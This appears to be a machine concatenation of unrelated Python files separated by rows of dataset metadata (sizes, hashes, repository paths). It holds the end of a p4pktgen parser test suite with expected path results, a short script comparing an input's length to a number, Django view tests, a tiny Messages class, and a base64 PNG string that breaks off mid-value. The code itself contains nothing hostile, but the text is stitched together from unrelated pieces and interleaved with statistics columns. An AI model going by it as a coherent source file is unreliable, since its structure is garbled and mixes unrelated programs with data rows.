TestPathResult.NO_PACKET_FOUND,
('start', 'parse_bad3', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (False, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_bad3', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (True, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4'))), (u'tbl_parserimpossibletransitions100', u'parserimpossibletransitions100')):
TestPathResult.SUCCESS,
('start', 'parse_bad3', 'sink', (u'node_2', (True, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_bad2', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (False, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_bad2', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (True, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4'))), (u'tbl_parserimpossibletransitions100', u'parserimpossibletransitions100')):
TestPathResult.SUCCESS,
('start', 'parse_bad2', 'sink', (u'node_2', (True, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_bad1', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (False, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_bad1', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (True, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4'))), (u'tbl_parserimpossibletransitions100', u'parserimpossibletransitions100')):
TestPathResult.SUCCESS,
('start', 'parse_bad1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0')))):
TestPathResult.NO_PACKET_FOUND
}
assert results == expected_results
def check_parser_impossible_transitions2_with_epl(self):
Config().load_test_defaults(no_packet_length_errs=False)
# Similar to the previous test case, this test case has
# several parser paths that are impossible to traverse, and
# several that are possible.
results = process_json_file(
'examples/parser-impossible-transitions2.json')
expected_results = {
('start', 'sink', (u'node_2', (False, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()')))):
TestPathResult.SUCCESS,
('start', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h5', 'sink', (u'node_2', (False, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'node_8', (False, (u'parser-impossible-transitions2.p4', 116, u'hdr.h2.isValid() || hdr.h3.isValid() || hdr.h4.isValid()'))), (u'node_15', (False, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'node_8', (False, (u'parser-impossible-transitions2.p4', 116, u'hdr.h2.isValid() || hdr.h3.isValid() || hdr.h4.isValid()'))), (u'node_15', (True, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff'))), (u'tbl_parserimpossibletransitions2l130', u'parserimpossibletransitions2l130')):
TestPathResult.SUCCESS,
('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'node_8', (True, (u'parser-impossible-transitions2.p4', 116, u'hdr.h2.isValid() || hdr.h3.isValid() || hdr.h4.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (True, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (True, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (True, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'tbl_parserimpossibletransitions2l115', u'parserimpossibletransitions2l115'), (u'node_15', (False, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff'))), (u'tbl_parserimpossibletransitions2l132', u'parserimpossibletransitions2l132')):
TestPathResult.SUCCESS,
('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (True, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'tbl_parserimpossibletransitions2l115', u'parserimpossibletransitions2l115'), (u'node_15', (True, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h1', 'sink', (u'node_2', (False, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'node_8', (False, (u'parser-impossible-transitions2.p4', 116, u'hdr.h2.isValid() || hdr.h3.isValid() || hdr.h4.isValid()'))), (u'node_15', (False, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'node_8', (False, (u'parser-impossible-transitions2.p4', 116, u'hdr.h2.isValid() || hdr.h3.isValid() || hdr.h4.isValid()'))), (u'node_15', (True, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff'))), (u'tbl_parserimpossibletransitions2l130', u'parserimpossibletransitions2l130')):
TestPathResult.SUCCESS,
('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'node_8', (True, (u'parser-impossible-transitions2.p4', 116, u'hdr.h2.isValid() || hdr.h3.isValid() || hdr.h4.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (True, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (True, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (True, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'tbl_parserimpossibletransitions2l113', u'parserimpossibletransitions2l113'), (u'node_15', (False, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff'))), (u'tbl_parserimpossibletransitions2l132', u'parserimpossibletransitions2l132')):
TestPathResult.SUCCESS,
('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (True, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'tbl_parserimpossibletransitions2l113', u'parserimpossibletransitions2l113'), (u'node_15', (True, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff')))):
TestPathResult.NO_PACKET_FOUND
}
assert results == expected_results
# Fill in expected results for this test case, and change name to
# have prefix 'check_' instead of 'xfail_', after p4pktgen has
# been modified to generate correct results for it. It generates
# incorrect results for this program now, because p4pktgen does
# not correctly handle multiple possible transitions from parser
# state A to parser state B.
def xfail_parser_parallel_paths(self):
Config().load_test_defaults()
results = process_json_file('examples/parser-parallel-paths.json')
expected_results = {
}
assert results == expected_results
| 108.358491
| 705
| 0.648616
| 4,598
| 34,458
| 4.674859
| 0.048282
| 0.040475
| 0.068016
| 0.037683
| 0.947197
| 0.942824
| 0.939474
| 0.929286
| 0.911514
| 0.903326
| 0
| 0.058214
| 0.151518
| 34,458
| 317
| 706
| 108.700315
| 0.676985
| 0.02461
| 0
| 0.494774
| 0
| 0
| 0.503111
| 0.25419
| 0
| 0
| 0.002381
| 0
| 0.038328
| 1
| 0.038328
| false
| 0
| 0.010453
| 0
| 0.052265
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0598fe2682b67df77f4bb97e5b010d1030e79a6c
| 287
|
py
|
Python
|
Preview Materials/Answers/prob_p21.py
|
WHU-Tan/NUS_AIWorkshop_2020_Summer
|
1a047884547b433816403883f384d18d56012978
|
[
"BSD-4-Clause-UC"
] | null | null | null |
Preview Materials/Answers/prob_p21.py
|
WHU-Tan/NUS_AIWorkshop_2020_Summer
|
1a047884547b433816403883f384d18d56012978
|
[
"BSD-4-Clause-UC"
] | null | null | null |
Preview Materials/Answers/prob_p21.py
|
WHU-Tan/NUS_AIWorkshop_2020_Summer
|
1a047884547b433816403883f384d18d56012978
|
[
"BSD-4-Clause-UC"
] | null | null | null |
s=input()
a=int(input())
leng=len(s)
if(leng>a):
print('True')
else:
print('False')
if(leng>=a):
print('True')
else:
print('False')
if(leng==a):
print('True')
else:
print('False')
if(leng!=a):
print('True')
else:
print('False')
| 11.958333
| 19
| 0.498258
| 40
| 287
| 3.575
| 0.275
| 0.167832
| 0.195804
| 0.335664
| 0.839161
| 0.839161
| 0.839161
| 0.839161
| 0.839161
| 0.839161
| 0
| 0
| 0.271777
| 287
| 24
| 20
| 11.958333
| 0.684211
| 0
| 0
| 0.631579
| 0
| 0
| 0.135849
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.421053
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
557239565601863d27dc77377519c9813c0ce578
| 399
|
py
|
Python
|
src/import_list_if/tests/test_views.py
|
iplweb/django-bpp
|
85f183a99d8d5027ae4772efac1e4a9f21675849
|
[
"BSD-3-Clause"
] | 1
|
2017-04-27T19:50:02.000Z
|
2017-04-27T19:50:02.000Z
|
src/import_list_if/tests/test_views.py
|
mpasternak/django-bpp
|
434338821d5ad1aaee598f6327151aba0af66f5e
|
[
"BSD-3-Clause"
] | 41
|
2019-11-07T00:07:02.000Z
|
2022-02-27T22:09:39.000Z
|
src/import_list_if/tests/test_views.py
|
iplweb/bpp
|
f027415cc3faf1ca79082bf7bacd4be35b1a6fdf
|
[
"BSD-3-Clause"
] | null | null | null |
from django.urls import reverse
def test_ListaImportowView_link(admin_app):
page = admin_app.get(reverse("import_list_if:index"))
page = page.click("pobierz plik wzorcowy")
assert page.status_code == 200
def test_NowyImportView_link(admin_app):
page = admin_app.get(reverse("import_list_if:new"))
page = page.click("pobierz plik wzorcowy")
assert page.status_code == 200
| 28.5
| 57
| 0.741855
| 57
| 399
| 4.947368
| 0.45614
| 0.113475
| 0.085106
| 0.113475
| 0.716312
| 0.716312
| 0.716312
| 0.716312
| 0.716312
| 0.716312
| 0
| 0.017699
| 0.150376
| 399
| 13
| 58
| 30.692308
| 0.814159
| 0
| 0
| 0.444444
| 0
| 0
| 0.200501
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 1
| 0.222222
| false
| 0
| 0.555556
| 0
| 0.777778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
55b908ad13cfedbd3c3c113c84dc81404dddabf2
| 204
|
py
|
Python
|
app/core/messages.py
|
Zadigo/ze_mailer
|
1398a84cb8e836637a2ad72aef2f6f417c00b14e
|
[
"MIT"
] | 1
|
2020-06-30T21:06:02.000Z
|
2020-06-30T21:06:02.000Z
|
app/core/messages.py
|
Zadigo/ze_mailer
|
1398a84cb8e836637a2ad72aef2f6f417c00b14e
|
[
"MIT"
] | null | null | null |
app/core/messages.py
|
Zadigo/ze_mailer
|
1398a84cb8e836637a2ad72aef2f6f417c00b14e
|
[
"MIT"
] | null | null | null |
class Messages:
def __init__(self, message):
self.message = message
def __str__(self):
return '[%s]: %s' % (self.__class__.__name__, self.message)
class Info(Messages):
pass
| 20.4
| 67
| 0.627451
| 24
| 204
| 4.666667
| 0.5
| 0.294643
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.240196
| 204
| 9
| 68
| 22.666667
| 0.722581
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0.142857
| 0
| 0.142857
| 0.714286
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
e956e8b50b68f045e84c6f7a41b9d0ba2cf323ea
| 105,735
|
py
|
Python
|
src/api/colors/cyan.py
|
Gummybearr/cf-ratings
|
04d1defa49e3f2babcb6cce1bf0fd1c4b046530c
|
[
"MIT"
] | null | null | null |
src/api/colors/cyan.py
|
Gummybearr/cf-ratings
|
04d1defa49e3f2babcb6cce1bf0fd1c4b046530c
|
[
"MIT"
] | null | null | null |
src/api/colors/cyan.py
|
Gummybearr/cf-ratings
|
04d1defa49e3f2babcb6cce1bf0fd1c4b046530c
|
[
"MIT"
] | null | null | null |
cyan = "data:image/png;base64,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